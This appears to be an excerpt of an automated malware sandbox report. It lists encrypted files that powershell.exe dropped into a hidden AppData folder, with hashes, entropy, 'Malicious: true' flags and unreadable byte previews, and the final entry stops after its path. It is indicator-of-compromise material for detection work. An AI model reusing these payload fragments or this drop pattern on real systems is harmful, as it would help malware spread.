Preview:	.....e.y....C..{......d..&...WN..%..6..E\\|aB.8Y....xX...^......N.is...e.V."Ka.0/....# {.....n.....-])..k.L<bj.~Yo.xJ.P.%9.......o...A.F.mv.?%N4.z..{.?...#\|........W..1{!....]..G..RP..."...S12v;#..I....!....b..Y... ^....]'....e.$..i.5.....t.b.............l,6.f>.%.LP.....0..Q2...._W..Fu..k...o$.[..~.>..u..D.h@...m\|+..... )oO.@...VS. ..O...&.y..E....h.$...s....t......)[.?.......7(......J..#?..P.....H.....Is.[e.cKY.V../.rf.....A....V......j.BfP..I.8...O.5i-.UP2.P...jf..../.S.#..F.2...s.0........N...!...5.\|.m......._.R.{&....T.....sd.^$mAy....2..;...]\|.K\|.n.............1...p....d....a=.K.n.../..5......,i.l.g.'C.CJI...v.v.....W.tv]....K....G`7...Z;.....h7.6z.n.d.H.@.N..../,....K.^8....$...i.....a..,...pr.".9/...~..>.:.?)\V..0+..4R.c......:...T..l"../B.4....EE....L...dH....eV....!..\|...RN.0.p:}.fr:.N..5..s.}.>..T....I.\.d.0f.Y!UZ.......r.w...A(..z.?.:.:......(.G.nC..v...6.l%.yD...O$..}4...O......E..g.nj.L.{.WM..O.....~...2.5.R...P

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JwCWisfRXVl.dAjDuFhKbVnMRNQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64395
Entropy (8bit):	7.997148482060771
Encrypted:	true
SSDEEP:	1536:okwixSzEp71hrKFWddYMNML6dCuSAZxjsay/bmbVWWhB:Chzg1hz/tNrCuX9y/bmRWWhB
MD5:	57A7EC17FE861A6A2F984B65EDC617E0
SHA1:	BFF6B9EE59347B99931D958DE011CDCFD695CC1C
SHA-256:	A31A21CE0579471987B362AAB302E6530AACB985260DD2B33D13019F94FCE270
SHA-512:	591BEDF8313519622464AC2AFAB9F12FB99CD0AF5F24B0BFBEAC871178E18A1FA9FB5E49A348349C704E3A26750619AA22DC4FE05058AF7A0DBD7D58A4880CA7
Malicious:	true
Reputation:	unknown
Preview:	.]x`..5..?.c......4d.7..J..i.._#je.mp.<(.H.....^.......@..[.5..@.K.j...;...~C..1..MFa.y}Z.v..rQf.n.a>E...../q..tt..U.2s..?....{..}Q....3.E7J...s.]{X..;F.P.3...$oYTJ...^."T.;8.....g.....2...D..4.zjk.b.wN..oN..=B$.R.47...(...(\0...?R...:.I.D?.....^.dC..Q9h..J?....@.:hm.i...q..8...Q....[!...x. ....$(..M..Q.....m..tI.7..L.jy.-P.......;..y..">...~.........5.#.0j....0.9P..y).,cqQ......vY..V.c..4T..j.x.......J.....e,...g..rv...g.SqDL.....<..uK.$....?r......c,m.L#.aZ..=...WZ..i.%..h1.G~r../_X...Q.C....M'..5...W........8.[l.......%.Q....A.I....R..._.)..Z.o..&m.1..F...S.zZ...6..P1...z.9.:...4.......wB.\"..Mt.....4...h.MVU..%....W...'.....%j.....qq.. .)..e?..`.7.u.D...l...(.g(...{v..6....GR2.3.X...d\|1.....<t....=.?...f........;....<.............?.......qH.m.G ..u......;%.p.......*.3.3<....i..h.Gs.Z.%-..+df...3K1...}..1..%.%..BCBu.....No..4....z'w..iW..E).)...B.s.._..........B..n+.y......$i...$s$u.i..._..Q.t.[_..N...x.!..1.....(.........^....z8..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KHqfjSmrYCQXAFWg.NcIzfXhVJQLdnTa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	164206
Entropy (8bit):	7.998977563341265
Encrypted:	true
SSDEEP:	3072:K2AF68nKt3nZYNAy5Duq8lDWAl/H6TptHS2X5wkZfO1d+AJw6enfXSu9+TP:K2AF6su3ZWRuPD3Sptv5nfO1d+cefXSB
MD5:	79E75DFC2C51E8F7C4BF96F7976D6462
SHA1:	0E15E9DD41AECB7299C6EEF99BCEA7F7C459EC04
SHA-256:	C848458E7FAB6A8FC2049B26D10B03C7E1855B3CF8861A68E294A128D2196CB8
SHA-512:	622F3B8C1C21086C552D55EEFA75308848B8BEE627F10E68A6A93D40F141742890859E67E0D58EFCB37DFE00BF91A42F4F9402F6D8BBD8AA245A14B9732B77C7
Malicious:	true
Reputation:	unknown
Preview:	....l.[.....P...b%..83..6....b.z.).Rc..x.4%..n.C."..q..c6j..5..wj.I..J....-...g...X............`....#;..=..y.omIt..Snk.o...&.._!n..m2_.W6.#.2l5-}.L..:..%......W%...AR..8....p.Y...i}..H:.\|:'.J.F...O.....\|.'.%.........~...C.K.X....;).!....:....U.>.l_.?F>....FA.F...p'.d.K......l..n.....a..........}q.ZV...D.^..Y:/..w.........O. .p.h...E.~..G).....G...b........>Hoj..)2;bXE9...Pw...h...../.$..^..!....X-....}J}.f.... 8.l.}.!0.sX.`a..^:.]..../........}...+.%..,..Z..l...Y....`t-.........2K.~.h.FKK..J..i..o..F#..g.....X..R.ew".O..v.7.....\|...'.s.u`t@.;<[....L.8..:Tc.zJIE{U..+...!..%.o]..V..E/..>..;.{..+.......{+kJ.8..h.$MK.K.M].M........x...PC...y...E.\|....>..a{_ ..Nq.].~.7Z..6G../vTM)F...i.eN.#C...(....D\|....K..L..8[.at\|>..........}...=..CA......W.#......lrp....M>=.e>.v>.2^...'....@$....rY.LN..l_........&..Ke.g...u..d.....&...at....F....&...h...`.........Y...K}...F.......c..JW..M'..a..}.9n.\cv..\.m......1".o.2.E$..`..H.b.K..m..;R.....p.VZ.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KPDshnwVZa.mnKktDqdRgHiLs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	71946
Entropy (8bit):	7.997709335101829
Encrypted:	true
SSDEEP:	1536:PKStbGBZ0mn5NrnFXxPUt/YyobiedRkSSks:P/tiBZ0mn5FFpBRBSB
MD5:	34874B1BAE19C3A34A790E363583FAFD
SHA1:	F5ECFE46E4607F723FA906C8BBC7409F58018DBC
SHA-256:	CCFB04DD13E3F3CC86ADDB94AE00C5B0B7032018281BF7E3FC93E5484E4A5D35
SHA-512:	564E40621D663AE02BD69354DD5446130CEC28F15D065681F85DEC949BEE35419CD88EA4A50641C0E4CE4404B78529F03810B23B85D659BD5A9E9A93FF043B92
Malicious:	true
Reputation:	unknown
Preview:	mc"...}.`"SL.we...v.X;.........F...,_S^...........q"....N1z[.0.....2.A.."...k ..!.oq5.....X..t......y.ih......H.....>.;.._./....).iQ.}..RQ.".x.KE..p.K.............[....X....\|.K.....^k.@....S7...'l.=cf..+z.k..C..,.:s.R.......U.x..\|....?B^..u....n...K.MY.A..l......W...3[..{.....d..dRB.....l..$I.Xi[...8.Eu..c./f..4t..r..."....@.Z..0 .,s.5..s,=8...^...VAj....R...35.H.H..=.t..j...+......Y.pwg..j...k.}....J.X.%_.='.X..[... ].c..a.H....XL....u..).......h.R......\|z!......7....+......?..j.0P.T....QQ.....0.5....>..}. .v"......D.....-..k5.z6.s.4...0...vW.0.4$)...?.O.kB@\|.f..(e.U....d2.Ic.j..Q_=...a8..`B<p....D.Z..@...o..@....Q<p...N..'...\|........I2{..@...G...vt..Js..k..K.iN:..D.iq............(c3....q.~.....9.r..., 2C....c~K;A....n>..~D..9.wv..7t&6._Y........?..:...z...@;...Da........Q..JbDGE.<q<L...$.6.....q....$...#....K.....7..\f..+..t....0.J.<_.(.Ym>.&&...j...,..T.....gF....e.t...ZN...n.x...h..y....7.ze_...6u...6.`b?.p....."..r.6..Q.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KoyvAufhDFgOX.QzlmLYbriNMySIU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88058
Entropy (8bit):	7.998021382523187
Encrypted:	true
SSDEEP:	1536:1UzF2DcIAfY7CCRAbgLqWcUpI8lJHdWKb2if76oV1auWJlxspq:mzFlf6CCibgLPpTlJHsKJf7b1PyN
MD5:	DD45713485A554D046CFCAC2C27B1FB3
SHA1:	CE429084F66E37798C72192C03501C9367A25F55
SHA-256:	67956D6B41C297FCC52D63281B50D02665E471D5F0FC960EEEA40E77604E3726
SHA-512:	7B0F74FC39D53F5D59D4C3CF1054A46D6187854FB9A67CDF34D923353CEAC6E7BD4FE8B1123B442705C9F98A5395D227799991CB9CDBEB60E9F8C98F8E11BDD0
Malicious:	true
Reputation:	unknown
Preview:	l.=.....~([SXp.\.8.bb;`I.!g...##_.'..`....O,..5....1..q.......u7/.B\t...R.6...~1.N4..U.J>.s...q....../.D.@<;..m...^.E....5.e.XI.7'}.>..BP.P..............n......v.f.......sL.....`.`..?x....%1pCi%..JRl....g;.{i.t....j.T....S}. /.e..:....j..=.Rf?.%..E.\e.....G...n.:X.....\|..wp..........MQ....1V<.]v.f..<...).t.F...l..\.9..4Y...;w.V..l".y.1.'8..ix...@...,f../-..5.}NP..\|?.+<.w~=.s..l7+<5..Ii....9..y.(..S.....ZH.W....A...B...'^.u...KF..6{N.... .....78.tz.?X..'By...p.<i...h2.S...{..q}........>.I.....N; E.A}.LV.J.#.(.I.EJ..6j..^.Wyq...6]E8.Nk..R=... .?.TO.P..M.\|...i.R.......c.,....:q....sj}H/.5.9..U.-.]q.....uW.>....?.WI....j..X......t/-V.m....ZZ...'.....@..Q2WU.eV.v.6..........%a..$.$r3.....f.m.Y.qRJC.....X..B.1.t.2lQ#..8.'.',{m:+A..P.6......H.q:.O.MO5...A..9..>_.#...Bo&!x#.....M...E,o>!".........S.P.(....R7...d~J.....!M'hkx.i".Z.MH.Y........,...8..Q....'.....Q.54..+6..8....L.........X!.yv..}L...$i.......d..'.".N...*.....d..}0U.. ..>m#.m?&.z.H.}.x...[k.6..Pd4

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KuxhdBJSlTcD.blNsUVtzhvOKk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	97130
Entropy (8bit):	7.997985134649154
Encrypted:	true
SSDEEP:	1536:j502lTjwE8Rux2PHbmx71n4xqLJnkWHDj80EtfUBqiw2YgE3myYuvY/c9HE:9ZlT8EH2jQ7p4xqLJnk2Djl2YqaEWyYt
MD5:	F3FBD9E0FC46F6A761BF02ECB5F5043A
SHA1:	C808E2D7BC280ED68DFD397B2A5746A974417FDA
SHA-256:	0CF450CB958D27C93A29EDF64DBBD6AD5E1F930DD632A00F6BF2CC051EDD6C0E
SHA-512:	EB6C8027974274E2535E6FB5BF50F31B0F961FE18D8F29965C30981A3551B9B108720B21B7EE7041BB65480048A5C8AC055B020EF3C8565471323164E85C3A74
Malicious:	true
Reputation:	unknown
Preview:	.R.vl?...bT.e.r..-........?I.4..Yf...;./..`.j..1k..+k.......KN9........4&+;3.n.....z.S.z...AH.z.R..#a.D...}...L.........w.0......4....0.J\|%....~IA.w.nE.%.l.....m..a...._...)..8<..N.....O.r.il.+..-..=..pZ_..(.KMr.^...Id..:..z..TL. .tH.j!..&4's.e.UY...B...l..C@,n...TX(....,.....~&h+..=..<p.R..F..M.u.0...{...vT....B.......;.-.+AP\..i8/.R...k..z-.F,..a......N..%...........V.q`c....1..!1>sK....r..3w.z..Q.....[.zj.N..k...N.I.).Cl..._.5G$i2....bi.I...B.W.y.......8...T.G.P..^.@.3..>.o..zS'.rg\.......6C..s..'n....k..5.D-,6....4]...q........8...gko..N.}.g.m........\..cm.1...-.5....h.l..\|..1.U..z.w.=.b......9.7."..U.F.ha.[;..P.y;.jH....O.......2.(%.1..(s.K.A.B-.a...."s...R..HA...sS?b`t...:.S..,4..../:S..eh.......lYEA...b~.+...-m..'..=D..Fvd..#....Z..Q...:..-..`8.._f..zOJr.y...U....q......v...t.`t.]q.S..2.A5..l>.Cv..1.\.{...v.u.F..)e.....A..+6...Ak..!.+...0y.% ......Y...P]/.y..Kw.....8.Q..:......Q...(..B..Qlo..$.`...kL.n.KG^.*.Se3....D...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KxAeNDkTOji.CzYLenjNughsBSo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	174814
Entropy (8bit):	7.99908487526895
Encrypted:	true
SSDEEP:	3072:a9K8CyXDsuAxgwYMcR34vVd/Vs+9plcD0x0VGnBmARx9dN+F:4KWfz3m99rcDjwnj9dMF
MD5:	42B161DE4264F6DEF49EA8343591CCF1
SHA1:	8F9EA159C193774BEAFC725C4C32C38141ABA202
SHA-256:	C1D6B9D5FA23A806A6CE221A765FE8FFBA694935BF8805566F833D4DB346C679
SHA-512:	557B5452738F57440A4EBE81312CA6A3103150CDE2F8932A45421BC2EE1DDDEE8F39B63CB83966DCD660238B0EC32342D56C1ADB362C33A85AE714F9A599B986
Malicious:	true
Reputation:	unknown
Preview:	3...`....`&...>n...j..Zb.....=.x(..0.].."...VR......"E.H.....g.b\7.....GJ...h}.,...........6........F...D..;;.....+#..~....5q.cx..^...V...O~.1/...(.-P6..C.e.....E.-;[.p....iy...#..P....w.HF]+w.....&..z.v.h.....rC.v..nN)...I..Z.....s...=z.5}I]74....o..-....!.s.........&.U.dze&...N..$c..o.Y..ro..2....H..a....xM...v..@.Q^.p.Y....)..ni.'......8....&...B\|.&..>.Na.Mf.N.5!..X.7\|.V._`Z..&V..zs..p..eg9=..o...U.bToL6...m?s.r..p..X`.<......Q.<.E...1z:......$,..Z!.9..%7.v".C...m...>W...EB#.....:.QD..T....x....42..S.cM.......L..#.U...^.2..+.............?..R.@./..<..0kjS....g..o.p...-]..A...w...T.<l..\|.hb...1.....O.m...)bsk....3...ck........Q......].%l.>.F..'..=...m..0..\w.u.?.4...I,...v!L....p>.-.sS.....U..ek9.A..e...:...~br1..,`.d...+V.pr.1. ._...m......@.w.1t>....Jh....X.4]3.\......8.d..@9...Rg._F....P..d"Q..)...^/.J..w..9R.....Q.......r..>~+0wt..la.V..O..../]..M..jAhS.,.P2.wrx*.Sw..~...D.!h...N...Z.<;......H.2.2O.U.h.O....>...(..3.e;

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KzRYhewSynBipuk.eEuhMmYCcsnvWzy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	148595
Entropy (8bit):	7.998643043167396
Encrypted:	true
SSDEEP:	3072:3zRIDKTYVh7OL5kKsbEzhtrf3nyfaH+nzBxtzO:3xTYVh6L5kKsCV3ngM+nLNO
MD5:	44F6714C3F99BB2F9284B75B951F563D
SHA1:	C741F49F0B193484CB5834FCEDE6479B58875C5D
SHA-256:	CB8B0D632D722B29DA852CAB636B02ACF692A6E269761B6C5E276550CE4FF69E
SHA-512:	1A234EFEF65187387739AB90BC2D91540A6C956301BA97A5F14987885439D021CB5FBC35A84FE1A1E87053B524EC9CF5EF2A85FA159B99BB7EFF6C0016BB686C
Malicious:	true
Reputation:	unknown
Preview:	y.A(.F.M.U ..0...}.}P..sV...>F\|}j..I:....+..0/:XUAq).}\|....6...).WLG.B..L....L.z...;.A6...I%....(w_....... ...bY..h.h H5..m...\|.Z...E._e..v..yt...Z......?.\~h.u.).p.A...+.;Seo......;...N.....`........o.R..TQ...u...E.}.!.tv,.e......c...+c.tH....,..=Z{.8..waS.K.#...`>.l...C...8..HI....U.X. .k....i...N.B..mML.(.....$(.......$.......:...tEL.G.fsc.h..........K}.bK.oY.z^...p"`..p.%o...f".?.+.(.l..z.....y:..<b.+.h.XpvT{.71:.z.....d;!V.er....!..u.oo......\|Jm.Yn.8.5......]oP....W.....<2thU.sb..Zo..w........k.h..V.0:y.a.kc..5....%\$.{..~.......z`X.}.....1R.}......!........n...V.%./g..J.8....F...>\|.dc).. .[h..M..`....n..p..(..n....3........o'..w".`..0m.Z..^.o.r..Z.Z7.[. e......s.z<......7~._G.!<U.........\...A.....a..d..#.....y.V..u......S^=.cq.U...<....;..E..)s.._......F.g..#..!KD....).~3Rr.Fz...Y...!.=Q!.L].'..Pe#..]I..rw...o.4.Dy...rc...j.!...........[8OC\|...5AtF.c........p.Y.O...H*d.# .`G.......HP......U.["...>...`."q.I.o..R8.@J.......]D..-.T-.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LAIEyPstUGzgbY.loDCFgnGXOe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	129906
Entropy (8bit):	7.998535190640957
Encrypted:	true
SSDEEP:	3072:weQLq+0vStkppHYVBA9DgmvvM8SnWty5KMGQm803Vr:VCDkpSSF8Rey5KzQmvr
MD5:	267DAC042FB9DC1C05D6DED1CD4A47BB
SHA1:	F974DC48DB9A57D83C020A3443E09EA901DAF76A
SHA-256:	6A9FDE6058517DA67E088463A2E61D34999442EF60C610160230DF20222EB450
SHA-512:	4B0FB2032C54C7C29D921C59280ACAA04D677886DEDD104A2691EE2D61FFB5A7920A3CDAA2232C6DF8A7F7039916B82D73C7489253CC0282A3711E3AE1BE6292
Malicious:	true
Reputation:	unknown
Preview:	...u......^...]W..v.y....P....hET.......u.Rc.}.T.L.>...r\|-.zo....5.N.>.j.....3,.0.{..S.-DT`E.q.\5.\|..6Fcm.E@......?......!..$.I.k{S.v....#H.w...f..2TA....]\.H....E;C6-E..hz..U$ .x.b).}..0.Z:...s>.#bZ.y=A[....8..D.&}t.&f..........(..."U...!..F,......]C.u.l.g...&.=...^.^Ir....M..+...v.PX......r.c.0,U./.+@.n.b..if.L...N.n.."V9g.....VJ....<......>G.J..@...U:L0(;4....h..\|.l(.....Q(.....G.....}....HvvV...T...k..6....&#^)!=..m..oB...{...C.....K....T..a.MU...Q..F..I...e.^.a.;R....\|.......o...x..?$q..D.....'.]...../c.......J..V:.k.^n8F.[..L5..8L.......U.T@...JW.\|#..t...MF.G..r:.i7..U.g.....V.)..].n\.K..}.6%..i.....\|_e....UH.{.dE%W.Fg......o.[m7O....I.Z..4....>DpKh.D.jr....mb.C..6.a8x....;.~).......BX.:TwG.w\..-...r=.6.r.B......{.....:."...s..E...e......hU.w..2M..S..=O..Dk.F.x....#..-.wh.K...A. jH.8..,.......X8.{.O....h.......X.Pc`u..'.}....VRVS....Cm..%....T..x#.)..I...uK..W......8:.m."..$=.3d.......3..V..O....Tl....Q....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LOTBqoQxmUyJKRufzj.uXYxUIaEQOVmPw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106073
Entropy (8bit):	7.998122460295794
Encrypted:	true
SSDEEP:	3072:CTTD/UeEyVTIFG0fId6773id3IozvXJnpTn3z:CTTLTTdlpIOxz
MD5:	BE604B78EF31308BBA1C109C3B647321
SHA1:	3BEE1CA4DA6AF0E1AE925484598C4004BBB57012
SHA-256:	43CC4856140B5808BE6A3E318DAF2AB13FBEFA027A41DAAFE0F1F5ADA569D14C
SHA-512:	4A13DCE511094247AF4CF2D4882E22D658319137503C5AEB12E4B1D8F17B179856280AEAF683EF649EC121DB89CC77A5A401BEC61A43B31FB35F3B25FF1DF30E
Malicious:	true
Reputation:	unknown
Preview:	xG.........4.d.....n....2.X....[>m.v.^Y.c...p...K..(...u.`.NjN.X.%..I.-.zU...o>`..@'.2.k.....V.M,E8K..y......kW!0....X..^H./E#\...6.ys..t.Vl...&.?...E@L.....mH.!-..#G...:..AS..Bv@.V.9&2+...#..{..i.........Z0.....~x.............L~..I.3k[..k.Q9O./y...\|.2......`..S...eE.J_do..tr.v5.G.'_.LD_G=3.q..5./.4.o.......}.:...Ni...M.,..).?.......0T......7IMXT.3.!....dX.i*".........M....x.\|!..9......n.).f....6..L.y7.m...qTtn]....r..0..$X..S.`Eq.`=S8=.0....G.+....)z.C....Lg .......}4.tf.Pp....3..Gac..@..C..q..+...R.4...W.x....1yj3.......\~..]=..[.t=.6r\|/.i....8.U..Z..y....C.......?5{.E...........y....-%MM..A.r.L.....A.9.......}1)~`.....{,.h..zE"..D...`....8...aIk<..&.........Y..F;-...CS...Kd>...,q..:.....g'u.t...t....Z..+{.S.;..\|.....}...,.....H :..}..rd....,..\|.6...Jyv.~.'.^....^%t...Htu......$V.^X.$..(lK....~.0...T.Q...j...8r9..!.m..Z.sMt..0..nb.+......7.Zu.`.'.\N.5.....!{: /..\..H..R.s^.9.,aQ@P...f"......+.>.yc.Gcp..+=..........{.]%..Y=..2......

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LOWIElhkoPRQfmAXSgG.wyhJvlLtVmYd Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	94607
Entropy (8bit):	7.998110196622075
Encrypted:	true
SSDEEP:	1536:4FXT+VoaR9nEQ4wlUl4Xg4zQvuJszeNBFufqQDe90cvVtjOoFtpOP5jhBeWl:IelC5wlLw48vuNpQDrctROoFLwBhBee
MD5:	5AACD0143AD5A3514AD027E18EA72D61
SHA1:	126731DF40126E33CF996694EA4913790A02A358
SHA-256:	51CF6200E0731AA19028CF648DEEE7557C685213D0E36DE349E4E75EB054CFC1
SHA-512:	6AE759680CC71FBD13FE8631729A8D99EBE6D7DDB0E4D3568373009DF78133E919C3FE63B3692228D02DF1420CF102122C518E3B27D4D1AF5C37B32D6AF65F98
Malicious:	true
Reputation:	unknown
Preview:	%.K....J..Z&ia..fg.X\|Bg.11?..?...s..FPdB0E..(9...........C!j/.w}I..~!..:.!;=....3..C;.KW.. ...\|..\..O$m..R..D!6eY.9...'....L.8.]..,..1p.q...........q.?GfxJPT}.K.A.....'qd.O.#.....[.%.6b.?X. ...\|q..8....).B.B.NX9.Z.lVR?.Q<@Q.8F..\|...?....sa.a..G4...h-....@...=.3.)...px^.T...u\|..ZO...`.$.Z.#m....3.....-LW..N.#9.......L......Z~A.u.k...]4.#7.l.VF\.F.-G)...pV....]A.l.9L1\.v...]V..u..H.A.z.K.{..U&+..E"...~..........h..I.F.U3..vd.lT..k.....`8.].vn.2..cv/3K;....v......0.p...O......XxA.7}../...r..l...Ni....v......q..L.1.b 8..A....`..4S.3.0..."/. .O...iW..4.X.4......r....~.O...\|.n`..Z.K.y...}..{......Sx.....g..A.0.x'.?.`.PF.+.se......f.d.;C.Kk.`...l..wr....M....%.....w..:..z.(....S'.`!&..p..h.%X.....bn....G...2o?s.....v^.{...9R.4=^....y.`H... ..X.d@....J6...NR..r@..$K.....Z..A..6.d....i.\B:.....vp..?.(..r.F.O.,..^<..E...np...p.I...;.N..#..f..g0C..+.HI....`.l....? ^.MT. _I..b............C_(...[.F.B.~o...%."m...8BeN.se~...M.w..7.b(S..5...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LfhvHKitGzrBOdcDCQ.GmNFixdOoWvawDBnKlZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	103589
Entropy (8bit):	7.99782897310658
Encrypted:	true
SSDEEP:	3072:0DgRTpjS5qZ7IbZCF453nn3OKOiWOGKcgFzjaLu+e:0sTc05CZUsn+KOiAKcIzjsu+e
MD5:	967E5C9F1A8023AE0A2D606CF0E65C25
SHA1:	0282086A5D622B6DAF9EE018C06C7C0032CA55E7
SHA-256:	04DBD01E342DD470B78DF46EBE1EC5A880FDB17A505D6A08A0FB062109C9D583
SHA-512:	7321F32FF41BFA443D9D6A823684C40E71B40E4265A7C52642F554B5122F3D9C3C63E96D9B75B674BC1A00E7516B0F654C8A2BC2008F61A56B02908158B9CF6D
Malicious:	true
Reputation:	unknown
Preview:	sE......~.....,.al.......4"\|j.p.. ..V..1...Nj)../....O..S.....Q7..A..... e.Ha._\|:......(.(..\|...@G..{..X...r;.....cb>.:.......1 .../.\|.U.,..d%...H..[\|..Dfc.)y.......C.f.Su..%...#.\|.h,....tX...>cI......(.O...[......&KGh..>....'y`.........}.\..T...<z.......\.3....1..+.P.Q....h7..m=.....o...^h....uZ..p).....e.D..1X.<..1N....... ...!..z.....=..R.C...y.......7.E..x..1P[....U..qxO...Kf:.;.......9.N....,suEJ..s...&..=@i.&~.......T)\|.z...~7!!.Xd..,...h..&t}.O.}m.J0..x.2...`....n.t....T.u.......4...i-gL6H.\..X0...a/.j.W...../Q.R\r.4.....7........'\|.....Q....3o...^..Ta=2.^......)ptC.....=.I.......O(}.\|.+..#.~..LL"$.U;.K.....q....G.gG.~....Y....~..6..1.g.U$.La.o0.U...5p(.Y.u9L!......6....)..3.m/..4.....y.N....YN.j..e.....d.,E.{.$P.c...1.o ...B..BP.`.......!.".....o...4.......HH........?M..0.w....,........b. ].....$.CXO..g...F.......U.?s0..s.u..q=..d.).z(eB..I...o...'v.Em..}+..M9...K.W.1jR.)...s.b5.<Yt..6X.}........N...#-..3&.:-.M].l..!.l

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LlrkBaCDsTpXFW.mWplMxeNQdPX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	108643
Entropy (8bit):	7.998372398211915
Encrypted:	true
SSDEEP:	3072:c8FKPEy+UR0IeaV5we46rr6d+wKt3mJ3EhV:c83t2e0q8liWV
MD5:	9BC6B058056B1B650C08881B44C8B3CA
SHA1:	6249BAC4956FA12AAEFEDF995F633E522B461E54
SHA-256:	9313145C9F4DB11A59CCFCCCA41D7552258756148B3FD7F9471B2209CDA574DC
SHA-512:	0531356874F15863475E4CD604A5A159EF6FCAA1CB70505D058A18C02BDEFC83366676DC17B0EB32AD9C19AEDC244098162D4B7111C9FABA15911413FB8B259D
Malicious:	true
Reputation:	unknown
Preview:	....FW.y:.8.G<D..^(...//.....T0V."{.(8.....o.y......+&l.=F.^I&...!.]6.'N.a...h.0y``.W.....b<Z[..}.b..,^...>..,....r!a%{.K.A...x$...}.\4p{..y1@6eA.e)r_W.....t.f....@YK.'>..Bw,........\|v....WH..\|q^ff....>..y...{F..5a. Nc.h:....Q...W.x.k....~...h.^..>..H...m..'O.....vw....f-..........S....f.../..!...$E-.......jg4..4+...u.E...........a......D.......p..3...Q.4.\|X(.-...K.u+.L..s.r4.N..s..\|..n...1.xk....T...s....Z...-?..]..:.rzx...x.V..x....\G....h......B..f...n..A....M{4;...\...^.....G....[a...\|C.M..e;.q..@...Co.h.7.X.).i....8..\|M~_.H......U...sa....!h....1.....X..Jyj....2..Q.......,...R.\..".T.'.)._kRA.6J.....1.D.....\...O...#.bc.X.E&.4_.(J.d.4\^._.G.'..'...D..A......ku.....7..do.f.q..b).AX]......YG..\|.q../..a).1C..A.F{\MV..{.:.1..p;..m.j.{.Tz........[./9...p..0..........m...m..i.....f.E.%r.#p...L..$v..7....)......"C.t..o....&Y..5Z...e.I.1"H.\.y.......R.Z..zHo..m.w..R..&..w.P.....Q..>).)......-.C.D.+..;)...5..%/.L.=...t'..c..{[..7..e...Y ..B

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\MRopmcZlCdzqrDeK.QrWZVTJFGdxRDg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	96887
Entropy (8bit):	7.998093560571975
Encrypted:	true
SSDEEP:	1536:R+5ZipeJ2iIMpjLs3tu/fmtGqaBk+82AQ5RYvJ6VEKXe+KvZe9BKwiAKFfON:oLNIMpjg5Ak+7ARNK+he9BKwvOON
MD5:	A40FB2E90D24D1FB5895063E890ECF00
SHA1:	8084465B3EBF76A1F87354B99D9CB5FC702F16F1
SHA-256:	A42A43B5E58BACA4FC9B7062F896CB4BD1169B8F6B7454819EBBD72C58BD3EF6
SHA-512:	854DAB75561A13522F65A9C9342B22D3D3439165E06A9F877737F58152EC5B1F504719B7930ACC7884845B704203AF26172C3A49057163BB5F81B6572F9EB4A3
Malicious:	true
Reputation:	unknown
Preview:	p.z.f.C.A.....N._.q.9...p;+..I......J... .....\|.i...Be...]}...c7......W.wN..DH....>...3.M....B._...U.....d..4.N4.TnG....wB..B.,.Ls.o..'..4...4..1.1...t.z..P.8-....{.,Y.....Ca..j...~...%.n..O..h..R\... I.b.O..3.=P1C<......{;.C.r.A.D{5....}...Xx6.n..N.b.t....LH....L...mF..".g5.JPo.-.:.vb.b.'s.l..."8..?..m...m...t.Ye...+.{...U#.3..L.W%...R\|..v8..s..#wo4.......z...c]..t..m...],'.Z..e#...<!...3 .5..........."........w.oR.Y.:.C.....~@U.}y..e.g......Jl\m=..&.3...J..{Q...T....RW...sJ.....a2\.8+.Kg.gv..a...\.F%..'9.f.?..W..'N....F5[s...%..8...Wn........:...h...W....=.ve...<..=..!#...a.'.q...,..\p.[U#\|4...p.+.o.4!".R........x......../m].i[.F.Cd..f..nm.j/bc...Y.J^..f...aB.....d..$'bk..Z.K....e}(.s....='.R.h...ysD....%...a_x.c(...=m.+c.;.z3._.YQ.g..$gMXzi_...K.xj...U..3.j.$..').\|^....F.........I.D.MV.[3...E....1.?.z.kXQ.<.....V..S.&s@uM&u\|D3.o.S.EzsMi..".....i.TE.z.Y-.....7...IZ...!P ].....q_.RG?F!F\|s....j.w.J...j..)..b.O.2#.5I...\.v.(.9..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\MYlHPzfIcubkUSsBFg.rPdQXMVgJaLzvui Download File
